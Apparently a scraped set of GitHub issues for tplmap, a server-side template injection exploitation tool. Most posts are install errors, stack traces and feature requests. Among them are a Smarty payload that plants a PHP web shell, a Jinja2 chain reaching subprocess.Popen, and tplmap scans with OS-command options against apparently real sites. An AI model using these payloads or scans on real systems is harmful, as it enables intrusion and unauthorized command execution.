at core.plugin$py.f$0(/opt/tplmap/tplmap/core/plugin.py:29)
at core.plugin$py.call_function(/opt/tplmap/tplmap/core/plugin.py)
at org.python.core.PyTableCode.call(PyTableCode.java:167)
at org.python.core.PyCode.call(PyCode.java:18)
at org.python.core.imp.createFromCode(imp.java:436)
at org.python.core.imp.createFromPyClass(imp.java:236)
at org.python.core.imp.createFromPyClass(imp.java:205)
at org.python.core.imp.loadFromSource(imp.java:651)
at org.python.core.imp.find_module(imp.java:543)
at org.python.core.PyModule.impAttr(PyModule.java:106)
at org.python.core.imp.import_next(imp.java:842)
at org.python.core.imp.import_logic(imp.java:904)
at org.python.core.imp.import_module_level(imp.java:978)
at org.python.core.imp.importName(imp.java:1062)
at org.python.core.ImportFunction.__call__(__builtin__.java:1280)
at org.python.core.PyObject.__call__(PyObject.java:431)
at org.python.core.__builtin__.__import__(__builtin__.java:1232)
at org.python.core.imp.importFromAs(imp.java:1156)
at org.python.core.imp.importFrom(imp.java:1132)
at plugins.languages.python$py.f$0(/opt/tplmap/tplmap/plugins/languages/python.py:90)
at plugins.languages.python$py.call_function(/opt/tplmap/tplmap/plugins/languages/python.py)
at org.python.core.PyTableCode.call(PyTableCode.java:167)
at org.python.core.PyCode.call(PyCode.java:18)
at org.python.core.imp.createFromCode(imp.java:436)
at org.python.core.imp.createFromPyClass(imp.java:236)
at org.python.core.imp.createFromPyClass(imp.java:205)
at org.python.core.imp.loadFromSource(imp.java:651)
at org.python.core.imp.find_module(imp.java:543)
at org.python.core.PyModule.impAttr(PyModule.java:106)
at org.python.core.imp.import_next(imp.java:842)
at org.python.core.imp.ensureFromList(imp.java:1024)
at org.python.core.imp.ensureFromList(imp.java:992)
at org.python.core.imp.import_module_level(imp.java:986)
at org.python.core.imp.importName(imp.java:1062)
at org.python.core.ImportFunction.__call__(__builtin__.java:1280)
at org.python.core.PyObject.__call__(PyObject.java:431)
at org.python.core.__builtin__.__import__(__builtin__.java:1232)
at org.python.core.imp.importFromAs(imp.java:1156)
at org.python.core.imp.importFrom(imp.java:1132)
at plugins.engines.mako$py.f$0(/opt/tplmap/tplmap/plugins/engines/mako.py:6)
at plugins.engines.mako$py.call_function(/opt/tplmap/tplmap/plugins/engines/mako.py)
at org.python.core.PyTableCode.call(PyTableCode.java:167)
at org.python.core.PyCode.call(PyCode.java:18)
at org.python.core.imp.createFromCode(imp.java:436)
at org.python.core.imp.createFromPyClass(imp.java:236)
at org.python.core.imp.createFromPyClass(imp.java:205)
at org.python.core.imp.loadFromSource(imp.java:651)
at org.python.core.imp.find_module(imp.java:543)
at org.python.core.PyModule.impAttr(PyModule.java:106)
at org.python.core.imp.import_next(imp.java:842)
at org.python.core.imp.import_logic(imp.java:904)
at org.python.core.imp.import_module_level(imp.java:978)
at org.python.core.imp.importName(imp.java:1062)
at org.python.core.ImportFunction.__call__(__builtin__.java:1280)
at org.python.core.PyObject.__call__(PyObject.java:431)
at org.python.core.__builtin__.__import__(__builtin__.java:1232)
at org.python.core.imp.importFromAs(imp.java:1156)
at org.python.core.imp.importFrom(imp.java:1132)
at core.checks$py.f$0(/opt/tplmap/tplmap/core/checks.py:141)
at core.checks$py.call_function(/opt/tplmap/tplmap/core/checks.py)
at org.python.core.PyTableCode.call(PyTableCode.java:167)
at org.python.core.PyCode.call(PyCode.java:18)
at org.python.core.imp.createFromCode(imp.java:436)
at org.python.core.imp.createFromPyClass(imp.java:236)
at org.python.core.imp.createFromPyClass(imp.java:205)
at org.python.core.imp.loadFromSource(imp.java:651)
at org.python.core.imp.find_module(imp.java:543)
at org.python.core.PyModule.impAttr(PyModule.java:106)
at org.python.core.imp.import_next(imp.java:842)
at org.python.core.imp.import_logic(imp.java:904)
at org.python.core.imp.import_module_level(imp.java:978)
at org.python.core.imp.importName(imp.java:1062)
at org.python.core.ImportFunction.__call__(__builtin__.java:1280)
at org.python.core.PyObject.__call__(PyObject.java:431)
at org.python.core.__builtin__.__import__(__builtin__.java:1232)
at org.python.core.imp.importFromAs(imp.java:1156)
at org.python.core.imp.importFrom(imp.java:1132)
at org.python.pycode._pyx5.f$0(/opt/tplmap/tplmap/burp_extension.py:313)
at org.python.pycode._pyx5.call_function(/opt/tplmap/tplmap/burp_extension.py)
at org.python.core.PyTableCode.call(PyTableCode.java:167)
at org.python.core.PyCode.call(PyCode.java:18)
at org.python.core.Py.runCode(Py.java:1386)
at org.python.core.__builtin__.execfile_flags(__builtin__.java:535)
at org.python.util.PythonInterpreter.execfile(PythonInterpreter.java:286)
at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at burp.id.<init>(Unknown Source)
at burp.emc.a(Unknown Source)
at burp.qg.run(Unknown Source)
at java.lang.Thread.run(Thread.java:745)
Payload: {Smarty_Internal_Write_File::writeFile($SCRIPT_NAME, "<?php passthru($_GET['cmd']);?>", self::clearConfig())}
Source: https://gist.github.com/aancw/492581f5faed962993c71cf233d52942
By default even if there is a succesfull injection the output is stderr
tplmap -u http://127.0.0.1:8080/page?name=lol 2>/dev/null (nothing)
tplmap -u http://127.0.0.1:8080/page?name=lol 2>&1 (success)
can you fix it please, thanks!
Your tool/software has been inventoried on Rawsec's CyberSecurity Inventory:
An inventory of tools and resources about CyberSecurity. This inventory aims to help people to find everything related to CyberSecurity.
More details about features here.
Note: the inventory is a FLOSS (Free, Libre and Open-Source Software) project.
Mainly because this is giving visibility to your tool and improve its referencing.
The badge shows to your community that your are inventoried. It looks good but also shows you care about your project, that your tool is referenced.
Feel free to claim your badge here: http://inventory.rawsec.ml/features.html#badges, it looks like that , but there are several styles available.
If you want to thank us, you can help make our open project better known by tweeting about it! For example:
That's all, this message is just to notify you if you care. Else you can close this issue.
Hi,
Are you able to add proxy support for the tool at all?
Have a vulnerable server using Jinja2 incorrectly. tplmap says that "no system command execution capabilities have been detected on the target."
But I can inject {{ [].__class__.__bases__[-1].__subclasses__()[79] }}
to reach <class 'subprocess.Popen'>
, and surely something can be done with that ...
running the command below I got the error below, please how do I go about resolving this
./tplmap.py -u 'http://X.X.X.X/login?next='
Traceback (most recent call last):
File "./tplmap.py", line 3, in
from core import checks
File "/home/kali/tplmap/core/checks.py", line 1, in
from plugins.engines.mako import Mako
File "/home/kali/tplmap/plugins/engines/mako.py", line 1, in
from plugins.languages import python
File "/home/kali/tplmap/plugins/languages/python.py", line 2, in
from core.plugin import Plugin
File "/home/kali/tplmap/core/plugin.py", line 3, in
from utils.loggers import log
File "/home/kali/tplmap/utils/loggers.py", line 4, in
import utils.config
File "/home/kali/tplmap/utils/config.py", line 3, in
import yaml
ImportError: No module named yaml
Any idea on this ?!
How do I continue to pwn the target or at least to confirm that the vuln is not false positive?!
root@kaLi:~/Desktop/scripts/tplmap# python tplmap.py -u 'https://www.target.com/category/movie*' --level 5 --os-cmd 'pwd' -e mako
[+] Tplmap 0.4
Automatic Server-Side Template Injection Detection and Exploitation Tool
[+] Testing if URL parameter 'url' is injectable
[+] Mako plugin is testing rendering with tag '${*}'
[+] Mako plugin is testing }* code context escape with 130 variations
[+] Mako plugin is testing %>*<%# code context escape with 130 variations
[+] Mako plugin is testing #\n*\n code context escape with 130 variations
[+] Mako plugin is testing </%def>*<%def name="t(x)"> code context escape with 130 variations
[+] Mako plugin is testing </%block>*<%block> code context escape with 130 variations
[+] Mako plugin is testing </%text>*<%text> code context escape with 130 variations
[+] Mako plugin is testing blind injection
[+] Mako plugin is testing }* code context escape with 130 variations
[+] Mako plugin is testing %>*<%# code context escape with 130 variations
[+] Mako plugin is testing #\n*\n code context escape with 130 variations
[+] Mako plugin is testing </%def>*<%def name="t(x)"> code context escape with 130 variations
[+] Mako plugin has confirmed blind injection
[+] Tplmap identified the following injection point:
URL parameter: url
Engine: Mako
Injection: </%def>*<%def name="t(x)">
Context: code
OS: undetected
Technique: blind
Capabilities:
Shell command execution: no
Bind and reverse shell: no
File write: no
File read: no
Code evaluation: ok, python code (blind)
[-][checks] No system command execution capabilities have been detected on the target.
Hey, maybe it would be necessary to add a test for each algorithm. For those who need it do not want to test everything yourself :)
TPLmap detects following.
Shell command execution: ok (blind)
Bind and reverse shell: ok
File write: ok (blind)
File read: no
Code evaluation: ok, php code (blind)
and i used --os-shell switch and it resulted into something like this.
(blind) $ whoami
False
(blind) $ ping example.com
False
I dont why it gives false as output.
please help me with this issue.
after given option to rerun with to gain shell access... it report parameters are not injectable
Apparently there is a bug when using python3:
Traceback (most recent call last):
File "tplmap.py", line 2, in <module>
from utils import cliparser
File "/usr/share/tplmap/utils/cliparser.py", line 163, in <module>
parser.formatter.format_option_strings = type(parser.formatter.format_option_strings)(_, parser, type(parser))
TypeError: method expected 2 arguments, got 3
This is similar to #4 but it sounds like python3 is finally supported: #33
Would it be possible to add some compat code so this works with python3?
I couldn't find any option that could help running an authenticated test using tplmap. Just like sqlmap provides --cookie argument which can be used to set the session cookies and run the authenticated scan, similarly there should be an option in tplmap that can be used to provide the session cookie values.
Alternatively, there should also be an option to parse the file into tplmap (just like -r and -l works in sqlmap), which can allow tplmap to parse the post request with session cookies.
Similarly to sqlmap, a wildcard could be used to indicate injection points that aren't standard GET parameters.
how to check multiple targets/urls using tplmap
Is it possible to add support for JSON content type.
For example, sending a POST request which contains parameters in JSON format.
Got the results below but it doesn't give any options to rerun.
Is there a way to take some advantage from that?
[+] Tplmap 0.4
Automatic Server-Side Template Injection Detection and Exploitation Tool
[+] Testing if GET parameter 'fromURI' is injectable
[+] Smarty plugin is testing rendering with tag '*'
[+] Smarty plugin is testing }*{ code context escape with 65 variations
[+] Smarty plugin is testing }{/if}{if 1}* code context escape with 65 variations
[+] Smarty plugin is testing var="" value=""}{assign var="" value=""}* code context escape with 65 variations
[+] Smarty plugin is testing blind injection
[+] Smarty plugin is testing }*{ code context escape with 65 variations
[+] Smarty plugin has confirmed blind injection
[+] Tplmap identified the following injection point:
GET parameter: fromURI
Engine: Smarty
Injection: 1))}*{
Context: code
OS: undetected
Technique: blind
Capabilities:
Shell command execution: no
Bind and reverse shell: no
File write: no
File read: no
Code evaluation: ok, php code (blind)
[+] Rerun tplmap providing one of the following options:
root@zion:~/tplmap#
I was reading this article: apparently it's possible to get a command execution for old versions Twig, but tlpmap doesn't support it.
Shall I issue a PR to support this, would consider for inclusion?
A feature similar to the --random-agent switch in sqlmap would be another nice thing to have. Be it where the entire "session" uses one randomly chosen user-agent, or where on a per-request basis one is chosen.
how to use blind os shell
there are very few doc online
I do not understand how to work
hello admin
iam whitehat member of bugbounty website
I systematically encounter the same error when I use the scanner with the option --level=5 in any case on this website with this option level=5 fatal error every time
install up to date on the scrach
/opt/tplmap/tplmap$ sudo python ./tplmap.py -u "https://www.xxxx.de/axxxe/?JSESSIONID=$%7b144*5%7d" --level=5[+] Tplmap 0.3
Automatic Server-Side Template Injection Detection and Exploitation Tool
[+] Testing if GET parameter 'JSESSIONID' is injectable
[+] Smarty plugin is testing rendering with tag '{}'
[+] Smarty plugin is testing }{ code context escape with 65 variations
[+] Smarty plugin is testing }{/if}{if 1}* code context escape with 65 variations
[+] Smarty plugin is testing var="" value=""}{assign var="" value=""}* code context escape with 65 variations
[+] Smarty plugin is testing blind injection
[+] Smarty plugin is testing }{ code context escape with 65 variations
[+] Smarty plugin is testing }{/if}{if 1} code context escape with 65 variations
[+] Smarty plugin is testing var="" value=""}{assign var="" value=""}* code context escape with 65 variations
[+] Mako plugin is testing rendering with tag '${}'
[+] Mako plugin is testing } code context escape with 130 variations
[+] Mako plugin is testing %><%# code context escape with 130 variations
[+] Mako plugin is testing #\n\n code context escape with 130 variations
[+] Mako plugin is testing </%def><%def name="t(x)"> code context escape with 130 variations
[+] Mako plugin is testing </%block><%block> code context escape with 130 variations
[+] Mako plugin is testing </%text><%text> code context escape with 130 variations
[+] Mako plugin is testing blind injection
[+] Mako plugin is testing } code context escape with 130 variations
[+] Mako plugin is testing %><%# code context escape with 130 variations
[+] Mako plugin is testing #\n\n code context escape with 130 variations
[+] Mako plugin is testing </%def><%def name="t(x)"> code context escape with 130 variations
[+] Mako plugin is testing </%block><%block> code context escape with 130 variations
[+] Mako plugin is testing </%text>*<%text> code context escape with 130 variations
[!][tplmap] Exiting: ('Connection aborted.', BadStatusLine("''",))
Traceback (most recent call last):
File "./tplmap.py", line 26, in
main()
File "./tplmap.py", line 19, in main
checks.check_template_injection(Channel(args))
File "/opt/tplmap/tplmap/core/checks.py", line 135, in check_template_injection
current_plugin = detect_template_injection(channel)
File "/opt/tplmap/tplmap/core/checks.py", line 126, in detect_template_injection
current_plugin.detect()
File "/opt/tplmap/tplmap/core/plugin.py", line 100, in detect
self._detect_blind()
File "/opt/tplmap/tplmap/core/plugin.py", line 226, in _detect_blind
blind = True
File "/opt/tplmap/tplmap/core/plugin.py", line 610, in evaluate_blind
blind=True
File "/opt/tplmap/tplmap/core/plugin.py", line 546, in evaluate
blind = blind
File "/opt/tplmap/tplmap/core/plugin.py", line 363, in render
blind = blind
File "/opt/tplmap/tplmap/core/plugin.py", line 304, in inject
self.channel.req(injection)
File "/opt/tplmap/tplmap/core/channel.py", line 285, in req
verify = False
File "/usr/local/lib/python2.7/dist-packages/requests/api.py", line 56, in request
return session.request(method=method, url=url, **kwargs)
File "/usr/local/lib/python2.7/dist-packages/requests/sessions.py", line 488, in request
resp = self.send(prep, **send_kwargs)
File "/usr/local/lib/python2.7/dist-packages/requests/sessions.py", line 609, in send
r = adapter.send(request, **kwargs)
File "/usr/local/lib/python2.7/dist-packages/requests/adapters.py", line 473, in send
raise ConnectionError(err, request=request)
requests.exceptions.ConnectionError: ('Connection aborted.', BadStatusLine("''",))
fakessh@fakessh:/opt/tplmap/tplmap$
Line 144 in cliparser:
parser.formatter.format_option_strings = type(parser.formatter.format_option_strings)(_,parser, type(parser))
TypeError: method expected 2 arguments, got 3
Hi, just want to know how to tamper or modify the payload
The problem is server will decrypt the request before executed
Example request (for base64)
tplmap.py -u 'http://domain.target/page?param1={{*}}'
So instead {{*}}
, the payload will become base64.b64encode("{{*}}")
. Thanks!
Hi, can you help me please to fix this error
./bin/pip install PyYaml requests
Downloading/unpacking PyYaml
Downloading PyYAML-3.13.tar.gz (270kB): 270kB downloaded
Running setup.py (path:/private/var/folders/bw/396sl31x6pg3bbn9nn0p22x00000gn/T/pip_build_Pentest/PyYaml/setup.py) egg_info for package PyYaml
Cleaning up...
Exception:
Traceback (most recent call last):
File "/path/to/install/jython/Lib/site-packages/pip/basecommand.py", line 133, in main
status = self.run(options, args)
File "/path/to/install/jython/Lib/site-packages/pip/commands/install.py", line 316, in run
requirement_set.prepare_files(
File "/path/to/install/jython/Lib/site-packages/pip/commands/install.py", line 316, in run
requirement_set.prepare_files(
File "/path/to/install/jython/Lib/site-packages/pip/req/req_set.py", line 397, in prepare_files
req_to_install.assert_source_matches_version()
File "/path/to/install/jython/Lib/site-packages/pip/req/req_install.py", line 478, in assert_source_matches_version
version = self.installed_version
File "/path/to/install/jython/Lib/site-packages/pip/req/req_install.py", line 474, in installed_version
return self.pkg_info()['version']
File "/path/to/install/jython/Lib/site-packages/pip/req/req_install.py", line 442, in pkg_info
data = self.egg_info_data('PKG-INFO')
File "/path/to/install/jython/Lib/site-packages/pip/req/req_install.py", line 371, in egg_info_data
data = read_text_file(filename)
File "/path/to/install/jython/Lib/site-packages/pip/util.py", line 777, in read_text_file
encodings = ['utf-8', locale.getpreferredencoding(False), 'latin1']
File "/path/to/install/jython/Lib/locale.py", line 574, in getpreferredencoding
return getdefaultlocale()[1]
File "/path/to/install/jython/Lib/locale.py", line 511, in getdefaultlocale
return _parse_localename(localename)
File "/path/to/install/jython/Lib/locale.py", line 443, in _parse_localename
raise ValueError, 'unknown locale: %s' % localename
ValueError: unknown locale: UTF-8
Storing debug log for failure in /Users/test/.pip/pip.log
nothing works, 100% false positive, this works only in your mind, another crap to make people waste time, thanks for nothing
any idea on how to use the --tpl-shell ?
can u put any how to please?!
Hi guys,
I need some help setting this up on Win10 Burp. I followed the instructions provided.
wget https://repo1.maven.org/maven2/org/python/jython-installer/2.7.2/jython-installer-2.7.2.jar
mkdir jython
java -jar jython-installer-2.7.2.jar -s -d c:\temp\jython -t standard
cd jython
bin\pip install PyAml requests
I get this error:
Traceback (most recent call last):
File "C:\Temp\tplmap\burp_extension.py", line 1, in <module>
from burp_extension.burp_extender import BurpExtender
File "C:\Temp\tplmap\burp_extension\burp_extender.py", line 2, in <module>
from config_tab import ConfigTab
File "C:\Temp\tplmap\burp_extension\config_tab.py", line 6, in <module>
from core.checks import plugins
ImportError: No module named core
at org.python.core.Py.ImportError(Py.java:329)
at org.python.core.imp.import_first(imp.java:1230)
at org.python.core.imp.import_module_level(imp.java:1361)
at org.python.core.imp.importName(imp.java:1528)
at org.python.core.ImportFunction.__call__(__builtin__.java:1285)
at org.python.core.PyObject.__call__(PyObject.java:433)
at org.python.core.__builtin__.__import__(__builtin__.java:1232)
at org.python.core.imp.importFromAs(imp.java:1620)
at org.python.core.imp.importFrom(imp.java:1595)
at burp_extension.config_tab$py.f$0(C:/Users/MarkoN/OneDrive/scripts/burp/tplmap/burp_extension/config_tab.py:103)
at burp_extension.config_tab$py.call_function(C:/Users/MarkoN/OneDrive/scripts/burp/tplmap/burp_extension/config_tab.py)
at org.python.core.PyTableCode.call(PyTableCode.java:173)
at org.python.core.PyCode.call(PyCode.java:18)
at org.python.core.imp.createFromCode(imp.java:630)
at org.python.core.imp.createFromPyClass(imp.java:312)
at org.python.core.imp.createFromPyClass(imp.java:255)
at org.python.core.imp.loadFromSource(imp.java:929)
at org.python.core.imp.find_module(imp.java:769)
at org.python.core.PyModule.findSubModule(PyModule.java:140)
at org.python.core.PyModule.impAttr(PyModule.java:107)
at org.python.core.imp.import_next(imp.java:1161)
at org.python.core.imp.import_module_level(imp.java:1350)
at org.python.core.imp.importName(imp.java:1528)
at org.python.core.ImportFunction.__call__(__builtin__.java:1285)
at org.python.core.PyObject.__call__(PyObject.java:433)
at org.python.core.__builtin__.__import__(__builtin__.java:1232)
at org.python.core.imp.importFromAs(imp.java:1620)
at org.python.core.imp.importFrom(imp.java:1595)
at burp_extension.burp_extender$py.f$0(C:/Users/MarkoN/OneDrive/scripts/burp/tplmap/burp_extension/burp_extender.py:5)
at burp_extension.burp_extender$py.call_function(C:/Users/MarkoN/OneDrive/scripts/burp/tplmap/burp_extension/burp_extender.py)
at org.python.core.PyTableCode.call(PyTableCode.java:173)
at org.python.core.PyCode.call(PyCode.java:18)
at org.python.core.imp.createFromCode(imp.java:630)
at org.python.core.imp.createFromPyClass(imp.java:312)
at org.python.core.imp.createFromPyClass(imp.java:255)
at org.python.core.imp.loadFromSource(imp.java:929)
at org.python.core.imp.find_module(imp.java:769)
at org.python.core.PyModule.findSubModule(PyModule.java:140)
at org.python.core.PyModule.impAttr(PyModule.java:107)
at org.python.core.imp.import_next(imp.java:1161)
at org.python.core.imp.import_logic(imp.java:1278)
at org.python.core.imp.import_module_level(imp.java:1369)
at org.python.core.imp.importName(imp.java:1528)
at org.python.core.ImportFunction.__call__(__builtin__.java:1285)
at org.python.core.PyObject.__call__(PyObject.java:433)
at org.python.core.__builtin__.__import__(__builtin__.java:1232)
at org.python.core.imp.importFromAs(imp.java:1620)
at org.python.core.imp.importFrom(imp.java:1595)
at org.python.pycode._pyx5.f$0(C:/Temp/tplmap/burp_extension.py:1)
at org.python.pycode._pyx5.call_function(C:/Temp/tplmap/burp_extension.py)
at org.python.core.PyTableCode.call(PyTableCode.java:173)
at org.python.core.PyCode.call(PyCode.java:18)
at org.python.core.Py.runCode(Py.java:1687)
at org.python.core.__builtin__.execfile_flags(__builtin__.java:535)
at org.python.util.PythonInterpreter.execfile(PythonInterpreter.java:287)
at java.base/jdk.internal.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
at java.base/jdk.internal.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
at java.base/jdk.internal.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.base/java.lang.reflect.Method.invoke(Method.java:564)
at burp.cbw.<init>(Unknown Source)
at burp.b7f.a(Unknown Source)
at burp.f96.lambda$panelLoaded$0(Unknown Source)
at java.base/java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:515)
at java.base/java.util.concurrent.FutureTask.run(FutureTask.java:264)
at java.base/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1130)
at java.base/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:630)
at java.base/java.lang.Thread.run(Thread.java:832)
For some reason, its not loading the modules correctly. Any help would be appreciated.
hey tplmap
burp extension crash
Traceback (most recent call last):
File "", line 1, in
UnicodeDecodeError: 'utf-8' codec can't decode bytes in position 15-17: invalid data
at org.python.core.codecs.strict_errors(codecs.java:204)
at java.base/jdk.internal.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
at java.base/jdk.internal.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
at java.base/jdk.internal.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.base/java.lang.reflect.Method.invoke(Method.java:564)
at org.python.core.JavaFunc.__call__(Py.java:2895)
at org.python.core.PyObject.__call__(PyObject.java:433)
at org.python.core.codecs.decoding_error(codecs.java:1603)
at org.python.core.codecs.insertReplacementAndGetResume(codecs.java:1572)
at org.python.core.codecs.PyUnicode_DecodeUTF8Stateful(codecs.java:1085)
at org.python.core.codecs.PyUnicode_DecodeUTF8(codecs.java:1021)
at org.python.core.Py.fileSystemDecode(Py.java:706)
at org.python.core.Py.fileSystemDecode(Py.java:719)
at org.python.modules.posix.PosixModule.asPath(PosixModule.java:1306)
at org.python.modules.posix.PosixModule.absolutePath(PosixModule.java:1317)
at org.python.modules.posix.PosixModule.chdir(PosixModule.java:300)
at java.base/jdk.internal.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
at java.base/jdk.internal.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
at java.base/jdk.internal.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.base/java.lang.reflect.Method.invoke(Method.java:564)
at org.python.core.PyReflectedFunction.__call__(PyReflectedFunction.java:190)
at org.python.core.PyReflectedFunction.__call__(PyReflectedFunction.java:208)
at org.python.core.PyObject.__call__(PyObject.java:461)
at org.python.core.PyObject.__call__(PyObject.java:465)
at org.python.pycode._pyx2.f$0(<string>:1)
at org.python.pycode._pyx2.call_function(<string>)
at org.python.core.PyTableCode.call(PyTableCode.java:173)
at org.python.core.PyCode.call(PyCode.java:18)
at org.python.core.Py.runCode(Py.java:1687)
at org.python.core.Py.exec(Py.java:1731)
at org.python.util.PythonInterpreter.exec(PythonInterpreter.java:268)
at java.base/jdk.internal.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
at java.base/jdk.internal.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
at java.base/jdk.internal.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.base/java.lang.reflect.Method.invoke(Method.java:564)
at burp.ee1.<init>(Unknown Source)
at burp.fae.a(Unknown Source)
at burp.bzo.lambda$panelLoaded$0(Unknown Source)
at java.base/java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:515)
at java.base/java.util.concurrent.FutureTask.run(FutureTask.java:264)
at java.base/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1130)
at java.base/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:630)
at java.base/java.lang.Thread.run(Thread.java:832)
hello, been trying to add spaces inside --os-cmd values like, / .. cannot add more than "1 single" line
tried using example: --os-cmd=start regedit.exe
result: -r is not an option...
thank you!
Hello community,
I have an error when im trying to install requirements.
I also have a problem installing pyyalm. The output of pip3 install pyyalm is that requirement already satisfied.
In addition, when i type pip3 show pyyalm it says packages not found.
I am a liitle bit confused.
Any help is really appreciated.
A nice feature to have would be Burp Proxy logfile parsing and fuzzing, ala sqlmap's "-x" option, having it automatically pull in targets to test from such logfile.
Often in SQLMap, I just copy the entire request to a file. I use:
python sqlmap.py -r requestFile.txt
to begin the attack.
Having such a feature would be great. Is there a feature like that for TPLMap?
Also, what if the post requests are JSON?
Hello,
Thanks for the awesome project.
Just want to confirm that following output is valid way to include headers ?
tplmap.py -u 'http://test.com/vulnerabilities/xss_r/?name=1' -c 'PHPSESSID=khts0212754guo737cii4p9i40; security=low' -H 'Accept-Language:en-US,en;q=0.9' -H 'Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8' -H 'User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36' --level=5
Thanks ~
Hello Admin,
Am facing issue while loading the burp extension, it is given Error, "no module name config_tab " i met all the requirement, i stall all the dependencies i am getting same error both in Kali and Windows with my Burp Pro. Kindly tell me what am doing wrong.
Regards
A declarative, efficient, and flexible JavaScript library for building user interfaces.
๐ Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. ๐๐๐
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google โค๏ธ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.